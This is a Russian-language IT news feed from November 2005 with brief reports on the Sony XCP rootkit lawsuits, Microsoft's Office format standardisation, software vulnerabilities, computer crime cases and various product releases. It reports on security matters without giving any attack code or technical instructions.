22/11/2005 12:25 Часто задаваемые вопросы по использованию ассемблера в Unix
На сайте opennet.ru приведена ссылка на довольно полезный FAQ, составленный участниками форума WASM.UNIX, а также эхи RU.UNIX.PROG, который посвящён вопросам (и ответам, естественно) использования языка программирования "ассемблер" в UNIX-подобных операционных системах. Возможно, статья будети представлять интерес для программистов, которые вынуждены заниматься низкоуровневым программированием.
Cтатья

22/11/2005 11:46 Штат Техас подал иск против Sony за выпуск дисков с защитой XCP
Штат Техас и правозащитная организация Electronic Frontier Foundation (EFF) подали иск против Sony BMG, обвиняя ее в нарушении американского закона о "шпионском" программном обеспечении (spyware). Речь идет о выпуске компанией музыкальных дисков с "вредной" защитой XCP, вызвавших масштабный скандал, уточняется на сайте Hollywood Reporter. По словам генпрокурора Техаса, штат требует от Sony выплатить по сто тысяч долларов штрафа за каждый случай установки на компьютер файлов - компонентов этой защиты без ведома пользователя, а также оплаты расходов на расследование и на адвокатов. В иске также отмечается, что несмотря на заявление Sony об отзыве таких дисков из продажи, они по-прежнему доступны покупателям. Что касается иска EFF с аналогичными обвинениями, то он был подан на днях в суд Лос-Анжелеса. Кроме того, EFF обвиняет Sony в нарушении закона о недобросовестной конкуренции, а также отмечает, что XCP устанавливается на компьютер, даже если пользователь не согласится с лицензионным соглашением перед проигрыванием диска. Сообщалось также, что еще один иск такого рода готовится и в Нью-Йорке.
Подробности

22/11/2005 11:26 Microsoft стандартизует форматы Office
Компания намерена передать форматы своих новых приложений Office 12 европейской организации по стандартизации ECMA International. Microsoft надеется, что это снимет опасения по поводу степени ее контроля над форматами документов. В начале декабря Microsoft планирует предоставить ECMA технические спецификации форматов файлов Office 12. В число спонсоров технического комитета входят также Intel, Apple Computer, NextPage и некоторые европейские заказчики Microsoft, включая British Petroleum и Британскую библиотеку. Создание полностью документированного проекта стандарта на базе этих форматов, называемого Microsoft Office Open XML, займет, вероятно, около года. Когда Microsoft Office Open XML будет признан стандартом ECMA, группа компаний намерена обратиться в Международную организацию по стандартизации (ISO), которая в секторе государственного управления пользуется особым авторитетом. «Превращение в открытый стандарт создает высокий уровень доверия к технологии, — сказал генеральный менеджер Microsoft по стратегии обслуживания информационных работников Алан Йейтс. — Мы надеемся, что это воспримут как начало исчезновения закрытых документов». Расположенная в Женеве ECMA разрабатывает стандарты и рекомендации. Microsoft уже предоставляла ECMA свое ПО для стандартизации, включая языки программирования ECMAScript и C#. В рамках своего проекта по стандартизации Microsoft изменит условия лицензии, чтобы снять «практически все барьеры» для программистов, работающих с форматами файлов. Компания уже сделала спецификации форматов документов XML из Office 2003 доступными на условиях royalty-free. Office 12, который должен выйти к концу 2006 года, по умолчанию будет сохранять документы в формате Open XML.
Более подробно

22/11/2005 10:07 Злоумышленники рассылают от имени ФБР письма с вирусами
Федеральное бюро расследований США в понедельник распространило обращение к пользователям Интернета с предупреждением о рассылке злоумышленниками писем с компьютерными вирусами, подделанных под официальные сообщения ФБР. На почту пользователя, говорится в обращении, цитируемом AP, приходит послание якобы от ФБР, в котором говорится, что адресат посещает запрещенные веб-сайты и ему требуется открыть прикрепленный файл, содержащий дальнейшие инструкции. После открытия этого файла пользовательский компьютер заражается вирусом, подробностей о которых не приводится. ФБР заявляет о полной непричастности к таким рассылкам и напоминает о необходимости соблюдать меры предосторожности, не открывая письма от неизвестных адресатов. О всех случаях получения посланий, рассылаемых от имени ФБР, следует сообщать на сайт центра по борьбе с Интернет-преступностью.
Подробности

21/11/2005 16:55 Беларусь закупила у Китая систему фильтрации интернет-трафика?
Авторитетная польская газета "Wyborcza" сообщила в минувшую пятницу о том, что Беларусь планирует или уже купила у Китая устройства для фильтрации интернет-трафика. Сообщается, что применить новую систему контроля интернета белорусские власти смогут этой весной накануне президентских выборов, которые должны состояться в 2006 году. Напомним, Китай является мировым лидером по разработке и использованию интернет-фильтров. Исследование, проведенное OpenNet Initiative (ONI), свидетельствует о высокой эффективности и оперативности разработанной в Китае системы контроля интернета, прозванной в мире "Великим Китайским файерволлом". В глобальной слежке за интернет-деятельностью китайских граждан задействованы тысячи государственных служащих и добровольцев. Фильтрация контента осуществляется как программными, так и аппаратными средствами. Из интернета мгновенно исчезает информация об оппозиционных политических партиях и антикоммунистические высказывания. Как только человек начинает искать в интернете информацию, касающуюся независимости Тайваня или Тибета, сведения о Далай-Ламе или об инциденте на площади Тиананмен, — этот человек немедленно оказывается заблокированным и отрезанным от Сети. Методика исследования ONI включала в себя как попытки оперировать информацией вне досягаемости китайских властей, так и непосредственно внутри страны.
Источник

21/11/2005 14:25 В iTunes и QuickTime обнаружены уязвимости
В Windows-версиях двух популярных приложений Apple - iTunes и QuickTime обнаружены критические уязвимости. "Дыры" позволяют удаленным злоумышленникам "захватить" систему пользователя. Такую информацию обнародовала фирма eEye Digital Security, специализирующаяся на компьютерной безопасности. Уязвимость была обнаружена спустя несколько дней после выпуска Apple обновления iTunes 6 для Windows. Таким образом, уязвимость содержат и предыдущая, и новая версии программы. Сначала eEye по ошибке вывесила на своем сайте предупреждение о том, что "дыра" "опасна для всех операционных систем". Однако в последствии окзалось, что страдает только Windows-версия. Тем не менее, сейчас специалисты eEye определяют наличие уязвимости в программы для ОС Mac. Уязвимость позволяет хакерам удаленно запустить на машине произвольный код, как только пользователь "кликает" на ссылку, ведущую на вредоносный веб-сайт, или открывает вредоносное письмо.
Подробности

21/11/2005 13:23 В Беларуси идет работа по разработке законодательства по борьбе со спамом
Так называемый «кардинг» или хищения путем использования компьютерной техники на сегодняшний день не является основным видом преступлений против информационной безопасности. В структуре компьютерной преступности в текущем году это лишь 11% от общего числа возбужденных уголовных дел. Об этом сегодня заявил замначальника Управления "К" МВД Беларуси Михаил Старикович во время online конференции на портале TUT.by. Михаил Старикович привел статистику за 10 месяцев 2005 года. Правоохранительными органами возбуждено 166 уголовных дел по преступлениям против информационной безопасности, из них хищений путем использования компьютерной техники (ст.212) — 23, несанкционированный доступ к компьютерной информации (ст.349) — 60, модификация компьютерной информации (ст.350) — 47, компьютерный саботаж (ст. 351) — 24, разработка вредоносных программ (ст. 354) — 8. На вопрос посетителя портала по поводу возможности привлечения к ответственности спамеров чиновник заявил, что "пользователь, осуществляющий рассылку так называемого «спама» осознает, что тем самым он умышленно нарушает правила эксплуатации компьютерной системы или сети. Если при этом по неосторожности происходит уничтожение, блокирование, модификация компьютерной информации, нарушение работы компьютерного оборудования либо причинение иного существенного вреда, то в его действиях усматривается состав преступления, определяемый ст. 355 Уголовного кодекса «Нарушение правил эксплуатации компьютерной системы или сети», которая предусматривает до семи лет лишения свободы. К сожалению, пока еще существуют проблемы с квалификацией правонарушения, если например спам рассылается из-за пределов Беларуси". Михаил Старикович сообщил, что в Беларуси идет работа по разработке законодательства по борьбе со спамом.
Источник

21/11/2005 13:09 Пять жуковских подростков совершили компьютерные преступления
В Жуковском районе Калужской области за 9 месяцев 2005 года по сравнению с аналогичным периодом 2004 года произошел значительный рост преступности несовершеннолетних. Если в прошлом году было совершено 23 преступления, то в текущем - 211. Такой скачок произошел из-за совершения пятью подростками компьютерных преступлений. Аналогичная ситуация складывалась в районе в 2003 году, однако судебные процессы над юными хакерами не послужили уроком для жителя Белоусово Фабера, жителей Кременок Бережнова, Чальченко и Полякова. Эти подростки были активными пользователями Интернета за чужой счет. Они познакомились с вариантами получения на свой персональный компьютер учетных имен других пользователей и паролей доступа в Интернет. Чужие имена нужны были для того, чтобы не платить самим за услуги Всемирной сети. С сайта на компьютеры копировалась специальная программа, предназначенная для подключения к удаленным компьютерам. Были использованы компьютеры предприятий и организаций на территории Калужской области, в результате имущественный ущерб составил от нескольких сотен до нескольких тысяч рублей. Как сообщает газета "Жуковский вестник", по данным фактам были возбуждены уголовные дела по соответствующим УК РФ, а родителям несовершеннолетних "хакеров", к тому же придется возместить ущерб в полном объеме.
Подробности

21/11/2005 12:22 Принципы разработки биллинговой системы
На сайте opennet.ru Денис Шергин опубликовал статью, которая посвящена общим принципам построения биллинговых систем. Описываются основные принципы построения подобных систем и характеристики составляющих компонентов.
Статья

21/11/2005 11:59 ООН: интернет для бедных остался на словах
Главным итогом Всемирного саммита ООН по проблемам информационного общества, завершившегося в пятницу, стало твердое обещание бороться с "цифровым разрывом" между развитыми и развивающимися странами. Однако это обещание может таковым и остаться, если не будут найдены источники финансирования. Изначально участники Мирового саммита ООН по проблемам информационного сообщества собирались детально обсудить план по устранению информационных барьеров между нациями и найти под этот проект денежные средства. Однако эту цель затмило недовольство многих стран тем, что США управляют интернетом. «Мы услышали лишь обещания, которыми нас кормят уже не первый раз, — говорит консультант по телекоммуникациям из Сенегала Диалло Мохамаду (Diallo Mohamadou). — В 2000 году они обещали подключить к Сети все малые деревни Африки, удаленные от крупных городов. Прошло пять лет — дело не сдвинулось с мертвой точки». По словам участников саммита, было рассмотрено более 200 новых инициатив, однако ни одна из них не была подкреплена конкретным финансовым планом, говорит глава департамента стратегии и политики Международного телекоммуникационного союза Т. Келли (T. Kelly).
Источник

21/11/2005 11:30 В рутките Sony использованы фрагменты ПО с открытым кодом
Технология ограничения копирования XCP компании First 4 Internet, использованная звукозаписывающим лейблом Sony BMG, вновь оказалась в центре внимания прессы и критиков. DRM-средства XCP, предназначенные для ограничения незаконного копирования, были применены с целью защиты примерно 50 тиражей с музыкальными записями различных исполнителей. Примечательно, что технология, предназначенная для защиты авторских прав, как выясняется, сама нарушала права разработчиков сообщества open source. По информации Reuters, в XCP применены фрагменты кода МР3-плеера Lame и другого открытого ПО. Лицензия Lesser General Public License (LGPL), в соответствии с которой распространяется Lame, позволяет использовать код плеера в других продуктах, однако при этом они также должны распространяться свободно. В компаниях First 4 Internet и Sony BMG данным условием пренебрегли. Комментариев со стороны разработчиков XCP по поводу нарушения прав сообщества open source пока не поступало.
Подробности

21/11/2005 10:19 Гиперпоточность ухудшает производительность сервера?
Intel утверждает, что когда ПО разделено на потоки, проявляются преимущества технологии гиперпоточности, но похоже, что в некоторых случаях эффект получается обратным. Технологию Intel Hyperthreading Technology (HT) обвиняют в проблемах производительности сервера. В системах с программным обеспечением SQL Server и Citrix Terminal Server материнские платы с включенной технологией НТ при высокой нагрузке демонстрируют заметное снижение производительности. Отключение НТ приводит к восстановлению расчетных уровней. «Наши заказчики жалуются на заметное ухудшение производительности при исполнении Citrix Terminal Server и нашего ПО на одной и той же машине». — говорит Питер Ибботсон, технический директор британской компании Lakeview Computers, специализирующейся на бухгалтерском ПО. — У нас случился переполох, когда мы включили гиперпоточность для тестирования, увидев, что материнские платы стали поступать с включенной функцией НТ. При отключенной гиперпоточности все возвращается к норме». Гиперпоточность позволяет разным элементам процессора одновременно исполнять разные участки программы. Intel утверждает, что это повышает производительность процессора и позволяет обрабатывать почти вдвое больше информации.
Подробнее

20/11/2005 13:02 Управление «К» МВД РФ пресекло распространение баз данных
16 ноября Управлением «К» МВД России осуществлен комплекс мероприятий по выявлению, документированию и пресечению фактов незаконного распространения автоматизированных баз данных государственных и коммерческих организаций на машинных носителях информации. В результате проведения оперативно-розыскных мероприятий на территории торгового комплекса «Горбушкин двор», торгового центра «Царицынский радиолюбитель» и Митинского радиорынка установлены четыре места продаж следующих баз данных: «ГИБДД Москвы и Московской области», «ЗИЦ ГУВД г.Москвы», «ЕГТС (МГТС)», «Москомзем», «ВЭД», «Налоговая по физическим лицам или Пенсионный фонд», «Сводки ГУВД за 2005 год», «Список сотрудников института МВД», «Банки России», «Антикриминал», «Федеральный розыск», «УВИР (иностранцы)», «ЦАСБ (прописка)». Из незаконного оборота изъято более 1600 CD- и DVD-дисков, содержащих закрытые сведения государственных и коммерческих организаций. Кроме того, сотрудниками Управления «К» МВД России установлены фирмы, арендующие торговые площади на территории торгового центра «Царицынский радиолюбитель». В ходе осмотра помещений данных фирм обнаружены компьютеры, предназначенные для тиражирования автоматизированных баз данных и нелицензионного программного обеспечения для ЭВМ. На жестком диске компьютера находились АБД «Антикриминал», «Федеральный розыск», «ГИБДД Москвы и Московской области», ряд других баз данных, а также контрафактное программное обеспечение «Кронос» и «1С: Предприятие». По предварительным оценкам, только правообладателям компьютерных программ, НПК «Кронос» и ЗАО «1С», нанесен ущерб в размере более 3 миллионов рублей.
Источник

20/11/2005 12:30 IBM предложит бесплатную базу данных ?
Корпорация IBM, возможно, будет бесплатно распространять стартовую версию СУБД IBM DB2, подобно тому, как это делают компании Oracle и Microsoft. DB2 Starter Edition может появиться уже в следующем году. Таким образом, IBM, как и ее конкуренты, стремится привлечь на свою сторону больше разработчиков. Условия, на которых будет распространяться стартовая редакция, пока не сообщаются.
Подробности

20/11/2005 11:56 Trend Micro отказалась от своих выводов
Через сутки после заявления об обнаружении TROJ_EMFSPLOIT.A, первого троянца, использующего эксплойт описанной в бюллетене MS05-053 критической уязвимости Windows, компания Trend Micro отказалась от своих выводов, сообщает сайт eWEEK.com. Описание вредоносной программы на сайте компании было изменено, из него были убраны упоминания об эксплойте вышеупомянутой уязвимости MS Windows. «В настоящее время наши аналитики работают с компанией Microsoft над тем, чтобы установить, использует ли TROJ_EMFSPLOIT.A уязвимость MS05-053 или же код программы затрагивает описанные в бюллетене MS05-053 ошибки лишь косвенно», — заявил представитель Trend Micro. Раймунд Генес (Raimund Genes), главный антивирусный технолог Trend Micro, признал, что первоначальные заявления компании были неверными. «У нас не было времени на тщательный анализ программы. Вместо анализа мы сконцентрировались на добавлении защиты от нее в наши антивирусные продукты», — сказал Генес в интервью. Он отметил, что полученный ими экземпляр вредоносной программы вызывал ошибку в работе explorer.exe (стандартная оболочка «Проводник» MS Windows) и утилиты EMF File Viewer в операционной системе Windows XP без установленных сервисных паков. Однако в системах Windows XP с установленными SP1 и SP2 никаких ошибок не возникало. По мнению Microsoft, «успешный» эксплойт описанной в бюллетене MS05-53 уязвимости должен приводить к сбоям в работе не только оригинальной Windows XP, но и Windows XP с установленными сервисными паками.
Источник

20/11/2005 11:24 Создание сервера для загрузки по сети под Linux
В руководстве "Setting up a PXE-Boot Server" показано как настроить сервер для загрузки Linux по сети, cообщает opennet.ru.
Руководство

20/11/2005 10:20 Новости с сайта peace4peace.com
На сайте компьютерного сообщества "Cyber Underground Community VS Terrorism", поставившего себе цель борьбы с онлайн-сайтами террористических организаций сообщается о запуске новой системы мониторинга и анализа содержимого целей, а также статистического отображения их работоспособности в виде графиков. Также в настоящее время производится анализ и обновление программного обеспечения ботнета с целью более эффективного подхода к атакам при оптимальных затратах ресурсов. В ближайшее время также планируется более плотно заняться продвижением ресурса, а так же обмен ссылками с ресурсами единомышленниками.
Подробности

19/11/2005 13:20 Премьера ноутбука за $100 состоялась на Всемирном саммите
Профессор Николас Негропонте (Nicholas Negroponte), обещавший показать рабочий опытный образец ноутбука за $100 в ноябре, сдержал слово. Складной портативный компьютер, заслуживший благодаря ядовитой окраске прозвище "зелёная машина" (green machine), дебютировал на Всемирном саммите по информационному обществу (WSIS), который ООН проводит в Тунисе. Генеральный секретарь ООН Кофи Аннан назвал ноутбук "выражением глобальной солидарности" и отметил важность того, что "дети смогут учиться". Аннан обратился к участникам саммита, убеждая их приложить все усилия для поддержки инициативы Негропонте. Члены ассоциации "По ноутбуку каждому ребёнку" (One Laptop per Child — OLPC) сообщили, что потребуется ещё шесть месяцев, чтобы закончить развитие компьютера. И "сражение" с ценой пока продолжается — нынешний прототип стоит около $130. Так или иначе, производство начнётся в третьем квартале будущего года.
Подробности

19/11/2005 13:09 В электронных магазинах украли 2,8 млрд. долл.
По данными компании CyberSource, за последний год владельцы электронных магазинов потеряли около 2,8 млрд. долл. дохода за счет мошенничества с помощью пластиковых карт, что на 8% больше, чем год назад. Компания Mindwave Research, также проводившая исследование электронных магазинов, выяснила, что для средних магазинов, оборот которых находился в пределах от 5 до 25 млн. долл., средний процент потерь от электронного мошенничества за год вырос с 1,5% до 1,8% от оборота. Причем более крупные компании теряют всего 1,2% оборота на сетевые мошенничества, а доля потерь мелких электронных магазинов составляет 1,6%. Таким образом, в "группу электронного риска" попадают именно средние магазины, которые, видимо, не всегда могут построить надежную защиту от мошенничества. При этом большинство магазинов пользуются двумя способами подтверждения подлинности транзакций по кредитным картам: соответствием адреса заказа и адресом, который указал банк для владельцев карточки, а также сверку номера карты с дополнительными напечатанными на ней номерами.
Источник

19/11/2005 12:58 Ежемесячные обновления Microsoft
Microsoft опубликовала набор своих ежемесячных обновлений, исправляющих ошибки связанные с безопасностью. В ноябре компания исправила три ошибки в обработчике графических файлов формата Windows Metafile, которые позволяли в том числе исполнять код, встроенный в картинку. Подобные файлы можно получить по почте или загрузить из Internet. Ошибки подобного типа традиционно используют для внедрения троянских кодов и программ-невидимок. Кроме того, Microsoft признала ошибку, которая существовала в межсетевом экране Windows Firewall и позволяла приложениям скрытно открывать порты на компьютере. Для этого приложению было достаточно получить доступ к реестру Windows, чтобы внести в него сведения об открытых портах. Исправления найденных компанией ошибок можно найти на сайте Microsoft или получить через сервис Windows Update. Кстати, в некоторых случаях работа последнего сервиса может блокироваться межсетевыми экранами. Для этого случая Microsoft предлагает пошаговую инструкцию для решения проблемы.
Источник

19/11/2005 12:36 Novell прекращает поддержку SuSE Linux 9.0
Компания Novell объявила, что 15 декабря 2005 г. будет снят с поддержки дистрибутив SuSE Linux 9.0 (Personal и Professional edition). С 15-го числа не будут выпускаться исправления и другие обновления программного обеспечения, входящего в состав этого дистрибутива, а текущие пакеты, доступные по адресу ftp.suse.com/pub/suse/i386/9.0, будут перемещены в каталог discontinued.
Nixp.Ru

19/11/2005 12:13 Как собрать простенький кластер ?
На linux.com появилась небольшая статья о том как собрать свой небольшой вычислительный кластер с удаленной загрузкой нод, сообщает linux.org.ru.
Статья

19/11/2005 11:40 Швейцарские связи помогли ПРОМТу проникнуть в NAS
Теперь астронавты будут пользоваться российским машинным переводчиком для чтения документации. Американское аэрокосмическое агентство установило на сервере международной космической станции и на карманных компьютерах экипажа систему машинного перевода Promt Professional 7.0 и ее карманную версию Pocket PROMT, разработанные российской компанией ПРОМТ. На использование этих программных продуктов NASA приобрело в октябре полсотни лицензий. Естественно, это ПО будет применяться не для общения на бытовом уровне, для которого у астронавтов, скорее всего, и так хватит словарного запаса и навыков, а при возникновении затруднений с переводом документации или специальных технических терминов. Как рассказала ZDNet генеральный директор и совладелец фирмы ПРОМТ Светлана Соколова, для американских космических служб название российской программы-переводчика уже давно «не пустой звук». Свои первые разработки ПРОМТ поставил специалистам NASA еще около десяти лет назад. Теперь автоматические переводчики ПРОМТа отличаются от аналогов главного конкурента — американской Systran — «как небо и земля», тем не менее поставщика системы машинного перевода для NASA по-прежнему определяет тендер. За обучение космонавтов работе с машинным переводчиком отвечала все та же PROMT Solutions. К приятному удивлению компании, «большинство астронавтов уже до начала тренинга умели работать с переводчиком, поэтому на их обучение понадобилось втрое меньше времени, чем планировалось».
Источник

19/11/2005 11:08 Интернет-досье на главных преступников Великобритании не выдержало популярности
Британская полиция открыла новый сайт, посвященный розыску особо опасных преступников. Сообщившие о событии британские СМИ характеризуют новый сайт - www.mostwanted-uk.org (раздел полицейского ресурса Crimestoppers) - как "сайт в стиле ФБР", апеллируя к сайту "10 самых опасных преступников" американского Федерального бюро расследований - этот список уже много лет возглавляет Осама бин Ладен. Сайт посвящен наиболее опасным преступникам Соединенного Королевства и содержит различные данные на них - фотографии, биографии, возможные псевдонимы, материалы с камер наблюдения. Посетителям, знающим что-либо о разыскиваемых преступниках, предлагается связаться с полицией по телефону или по Интернету. Когда британские СМИ начали сообщать о начале работы нового ресурса, он вскоре прекратил работать, так число желающих его посетить оказалось очень велико. Как сообщает BBC News, число посетителей доходило до 21 тысячи за пять минут. В связи с этим сайт перестал отвечать. Впоследствии появилось объявление о том, что сайт временно не работает из-за "беспрецедентной популярности". Эта ситуация наблюдалась и на момент написания данной заметки.
Источник

18/11/2005 16:35 Microsoft ускорит выпуск новых версий SQL Server
Корпорация Microsoft намерена существенно ускорить выпуск новых версий своей базы данных SQL Server. Около полутора недель назад Microsoft анонсировала пакет SQL Server 2005. Данный программный продукт характеризуется обновленным интерфейсом приложений, имеет большое количество новых функций, обладает расширенными средствами безопасности и улучшенным быстродействием. По утверждениям Microsoft, переход на новую версию ПО позволит повысить производительность труда и гибкость управления информацией. Однако на разработку SQL Server 2005 у корпорации Microsoft ушло пять лет, что вызвало негативную реакцию со стороны многих клиентов и, в частности, подписчиков программы Software Assurance. Инициатива Software Assurance предоставляет клиентам корпорации право использовать любые новые версии продуктов, выпущенные в течение действия лицензионного соглашения, а также обеспечивает их оперативным доступом к усовершенствованиям и новой функциональности, которой продукт дополняться в рамках текущей версии. Кроме того, Software Assurance включает пакет бесплатных услуг, призванных помочь заказчикам максимально эффективно использовать приобретенное программное обеспечение.
Подробности

18/11/2005 12:28 Обновилась утилита WinPatrol
Вышла версия 9.8.0.0 утилиты WinPatrol, неплохого бесплатного монитора потенциально уязвимых участков системы. Принцип работы программы WinPatrol прост. При установке она запоминает состояние критических участков операционной системы (ключи реестра, файлы и т.д.), а в дальнейшем следит за ними и попытками их изменения посторонними программами. При попытке внесения изменений WinPatrol выдает предупреждения. В версии 9.8 оптимизирован и обновлен код программы. В список объектов для слежения добавлено несколько ключей реестра, в том числе отвечающих за автозагрузку программ. Доработан механизм контроля за файлами cookie браузера.
Пользователям более ранних версий WinPatrol рекомендовано обновить программу. Разработчики обещают защиту в случае попыток проникновения spyware и adware программ, вирусов и вредных дополнений к Internet Explorer, попыток переопределения расширений файлов, подмены стартовой страници браузеров и установки "вредных" cookies. WinPatrol поможет принудительно завершить вредоносную программу, которая пытается удержаться в памяти путем порождения дополнительных процессов, блокирует программы, повторно добавляющие себя в "Автозагрузку" после их удаления оттуда. Программа бесплатна.
Cайт проекта

18/11/2005 11:45 Хакеры готовятся спрятать боты от программ защиты
В ближайшем будущем программы-боты, превращающие компьютеры в инструменты для рассылки спама, будут создаваться с применением технологий шифрования. Таким образом, создатели ботов будут скрывать их от антивирусных сканеров, полагает американский инженер Адам Майерс (Adam Meyers). «Мы столкнемся с зашифрованными сессиями. А как только эти программы станут зашифрованными, выявлять их станет значительно труднее», — приводит слова Майерса сайт News.com. После установки бот обычно соединяется с IRC-каналом, через который к нему поступают внешние команды. IRC-трафик является основным свидетельством возможного присутствия на компьютере вредоносной программы и выявляется системами обнаружения вторжения (IDS) или анализаторами протоколов, например, Ethereal. «Создатели ботов постараются обойти IDS. Они будут делать все возможное, чтобы обеспечить себе возможность заниматься тем, чем они занимаются. С появлением таких технологий людям, которые занимаются выявлением ботов, понадобится некоторое время, чтобы оказаться на одном уровне с создателями ботов», — говорит Майерс. Правоохранительные органы, похоже, принимаются за борьбу с распространителями и создателями ботов. В начале ноября власти США объявили о первом аресте в рамках дела о распространении ботов. В октябре полиция Нидерландов сообщила об аресте трех человек, инфицировавших ботами около 1,5 миллиона компьютеров.
Подробности

18/11/2005 11:16 В AIM появились незваные "друзья" спамеры
Два новых "приятеля" приветствовали пользователей интернет-пейджера AOL IM на этой неделе: MovieFone и ShoppingBuddy. Со временем выяснилось что это программы-роботы, внедренные компанией для продвижения своих сервисов кино и покупок. Обычно пользователи сами добавляют новых лиц в списки контактов, но эти появились без спроса. Последний спонсировался компанией Gap. При отправке им сообщения "приятели" советовали посетить соответствующие сервисы. В AOL IM уже существуют два робота, транслирующих новости и результаты бейсбольных матчей, но их нужно добавлять в список специально. По словам представителя AOL Кристы Томас (Krista Thomas), введение MovieFone и ShoppingBuddy – эксперимент. Пользователи новых версий получают предупреждение о пополнении списка и могут легко их убрать, следуя инструкциям в информации "автоматических приятелей", или прочесть об этом на веб-сайте. Автоматическое добавление, по ее словам, было предпринято для того, чтобы пользователи узнали о существовании таких роботов. Компания ждет отзывов, чтобы решить, повторять ли такую практику в будущем, и пока реакция на этот шаг неоднозначна.
Источник

18/11/2005 10:41 Sun открыла файловую систему OpenSolaris
Компания Sun Microsystems предложила разработчикам исходный код важного компонента своей серверной операционной системы. В среду в рамках «сборки», или обновления, OpenSolaris компания открыла исходный код ZFS, системы управления данными и файлами. Первую часть кода своего проекта OpenSolaris Sun открыла в июне, а затем добавляла другие компоненты. Ожидается, что на пресс-конференции в Бостоне, где выступит исполнительный вице-президент Sun по программному обеспечению Джон Лойаконо, руководители компании расскажут об OpenSolaris и ZFS, а также о стратегии в области открытых баз данных. В феврале этого года топ-менеджеры Sun высказали намерение добавить базу данных с открытым исходным кодом к продуктам, которые она обслуживает. Но пока компания не сообщила никаких новых подробностей. В недавнем интервью главный технолог Sun Хол Стерн сказал, что инженеры Sun «играют с Derby», встроенной базой данных Java с открытым исходным кодом, которую IBM пожертвовала Apache Foundation. В августе Sun говорила, что ее сотрудники готовы работать над проектом Derby.
Подробности

18/11/2005 10:23 "Корбина" обещает провести оптоволоконный интернет-кабель в каждый московский дом
Российский оператор связи "Корбина-Телеком" планирует к ноябрю 2006 года охватить своей сетью высокоскоростного доступа в Интернет практически всю территорию Москвы. Как сообщается на сайте "Независимый обзор провайдеров", посвященном российскому телекоммуникационному рынку, представители компании объявили об этом накануне на пресс-конференции с названием "Перелом на рынке широкополосного доступа в Москве". "Корбина" планирует покрыть 26 - 27 тысяч домов из имеющихся в городе приблизительно 30 тысяч, причем в каждый дом будет заведен гигабитный оптоволоконный кабель. Для этой цели за указанное время предполагается построить около 5 тысяч километров оптоволоконных линий в дополнение к 1,5 тысячам уже имеющихся. Бюджет проекта оценивается в 72 миллиона долларов, из которых около 50 миллионов составят привлеченные средства, а около 20 миллионов - реинвестированная прибыль. Представители "Корбины-Телеком" озвучили тарифы, которые будут предлагаться через год. Предполагается, что в семействе тарифных планов без учета трафика канал с пропускной способностью 512 килобит в секунду обойдется в 24 доллара в месяц, 1 мегабит в секунду - в 33 доллара, а 2 мегабита - в 49 долларов. При помегабайтной оплате за 12 долларов в месяц можно будет приобрести пакет на 200 мегабайт, за 25 долларов — на 10 гигабайт и за 42 доллара на 20 гигабайт. Подключение при этом является бесплатным, уже действующие сейчас в Москве тарифы предполагают обязательный авансовый платёж в размере не менее 30 долларов.
Источник

18/11/2005 10:00 Личную жизнь россиян защитит спецорган
Данные личного характера о россиянах можно будет собирать и обрабатывать только с их согласия, причем интересоваться сведениями о национальности, религиозных убеждениях, сексуальных наклонностях или судимостях будет запрещено. Такие положения содержатся в правительственном законопроекте "О персональных данных", который поступил на днях в Госдуму. Авторы законопроекта намерены установить единые требования по хранению, обмену и защите сведений. Разработает этих требования специальный "федеральный орган по защите прав субъектов персональных данных". Кроме того, новое ведомство получит право расследовать факты незаконного предоставления информации, а также будет вести реестр информационных систем персональных данных. В свою очередь, собирающие сведения компании будут обязаны защитить свою информационную систему от уничтожения и от несанкционированной утечки данных при помощи различных шифров и кодов. Заинтересованные в информации организации будут обязаны поставить респондента в известность, кто и для чего планирует использовать данные о нем. Законопроект подготовлен в связи с ратификацией подписанной Россией в 2001 году Конвенции Совета Европы о защите физических лиц при автоматизированной обработке персональных данных.
Источник

17/11/2005 13:46 Стандарт CDMA2000 — 73 Мбит/с к 2008 г
Новая версия стандарта CDMA2000 EV-DO Revision B предусматривает многопоточную передачу данных на скоростях до 73,5 Мбит/с «вниз» и до 27 Мбит/с «вверх». Группа по развитию CDMA, международная отраслевая организация, которая продвигает стандарт передачи данных для сотовых телефонов CDMA (Code Division Multiple Access), объявила о разработке новой версии стандарта, в которой значительно увеличены скорости передачи данных. Принятие новой версии CDMA2000 EV-DO Revision B может стать значительным шагом вперед на рынке мобильной связи. Официальная публикация стандарта CDMA2000 EV-DO Revision B состоится в I кв. 2006 г., а коммерческая эксплуатация начнется примерно через два года. Технические характеристики нового стандарта были оглашены на Всемирном конгрессе 3G, который в эти дни проходит в Гонконге. Сегодняшние сети EV-DO обычно поддерживают скачивание данных на скорости около 2,4 Мбит/с, а в следующем году повсеместно пройдет апгрейд сетей до версии CDMA2000 EV-DO Revision A, что позволит увеличить скорости до 3,1 Мбит/с. Следующий апгрейд Revision B, также как и текущий, является обратно совместимым, то есть позволит старым устройствам работать как и раньше, на прежних скоростях. А вот новые устройства с поддержкой нового стандарта смогут значительно ускориться.
Сайт проекта

17/11/2005 13:21 Пакет Sun Studio 11 стал бесплатным
Sun Microsystems объявила о возможности бесплатно скачать и использовать среду разработчика и набор компиляторов (C, C++, Fortran) Sun Studio 11, платными осталась только коробочная версия (40$) и контракт на техническую поддержку, cообщает opennet.ru. Sun Studio 11 может использоваться под Solaris и Linux.
Подробности

17/11/2005 12:55 Microsoft Virtual Server R2 поддерживает ОС Linux
Корпорация Microsoft выпустила ПО виртуализации Microsoft Virtual Server R2, которое теперь официально поддерживает Linux, cообщает linux.org.ru. Среди прочих возможностей указывается возможность переноса виртуальной машины с одного сервера на другой в случае аппаратного сбоя первой. В сожалению, технология hyperviser, которая позволяет запускать виртуальную машину на более низком уровне виртуализации, не была включена по нескольким причинам (в т.ч. отсутствие процессоров поддерживающих её).
Подробности

17/11/2005 12:32 Microsoft представит две новые версии Windows XP Starter Edition
В ближайшее время Microsoft представит две новые версии Windows XP Starter Edition - на арабском и турецком языках. Данная инициатива софтверного гиганта станет лишь первой частью программы Microsoft, направленной на освоение развивающихся рынков. Таким образом, Windows XP Starter Edition будет доступна в версиях на девяти языках для 32 стран. Windows XP Starter Edition предназначена для компьютерных новичков. Для них в системе есть специальные подсказки и видеофрагменты, знакомящие неопытных пользователей с принципами работы с Windows, прикладными программами и интернетом. Однако за подобную простоту приходится расплачиваться значительно урезанной, по сравнению с возможностями Windows XP, функциональностью: отсутствует поддержка локальных сетей и сетевых принтеров, а также возможность установки разрешения экрана выше 800x600 пикселей и создания нескольких пользовательских аккаунтов.
Подробнее

17/11/2005 11:38 В ПО различных производителей найдена уязвимость
